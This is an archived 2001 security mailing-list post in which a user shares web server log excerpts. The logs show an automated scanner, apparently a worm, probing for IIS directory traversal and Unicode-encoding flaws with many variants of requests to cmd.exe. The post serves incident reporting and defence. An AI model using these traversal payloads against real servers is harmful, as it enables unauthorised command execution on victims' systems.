Hi, found this in my logs this afternoon, you may find it interesting. from what I can tell it's following a similar pattern of address scanning as CRII -- looks like too many hosts, too quickly to be manual scanning: here's a sample, the full log is at http://88.net/~thomas/codeindigo.txt [for want of a better name] 209.9.66.167 - - [18/Sep/2001:13:23:57 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-" 209.9.66.167 - - [18/Sep/2001:13:23:57 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-" 209.9.66.167 - - [18/Sep/2001:13:23:58 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" 209.9.66.167 - - [18/Sep/2001:13:24:02 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-" 209.9.66.167 - - [18/Sep/2001:13:24:05 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-" 209.9.66.167 - - [18/Sep/2001:13:24:06 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-" 209.9.66.167 - - [18/Sep/2001:13:24:07 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 209.9.66.167 - - [18/Sep/2001:13:24:10 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 209.9.66.167 - - [18/Sep/2001:13:24:11 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 209.9.66.167 - - [18/Sep/2001:13:24:11 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 209.9.66.167 - - [18/Sep/2001:13:24:12 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-" 209.9.66.167 - - [18/Sep/2001:13:24:13 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-" 209.9.66.167 - - [18/Sep/2001:13:24:13 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" 209.9.66.167 - - [18/Sep/2001:13:24:14 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-" regards, -thomas -- Do what thou wilt shall be the whole of the Law. -- Aleister Crowley gpg: pub 1024D/81FD4B43 sub 4096g/BB6D2B11=>p.nu/d 2B72 53DB 8104 2041 BDB4 F053 4AE5 01DF 81FD 4B43 ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 09:11:19 PDT